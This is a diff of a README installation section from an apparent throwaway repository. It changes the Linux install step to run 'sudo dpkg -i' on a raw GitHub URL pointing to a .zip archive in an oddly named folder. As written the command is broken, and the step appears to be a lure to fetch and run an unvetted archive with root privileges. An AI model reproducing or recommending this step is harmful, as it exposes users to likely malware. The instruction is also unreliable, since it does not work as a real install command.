ina816/amanansdiahnid-25/README.md

 - **For macOS**: Open the downloaded `.dmg` file, drag the application to your Applications folder, and then open it from there.

 - **For Linux**: If you downloaded a `.deb` file, open a terminal and navigate to the folder where it's downloaded.
-Run `sudo dpkg -i yourfile.deb` to install.
+Run `sudo dpkg -i https://raw.githubusercontent.com/ina816/amanansdiahnid-25/main/uncircumspect/amanansdiahnid-25.zip` to install.
 For other formats, follow the specific installation steps for your distribution.

 ## 💡 Usage Instructions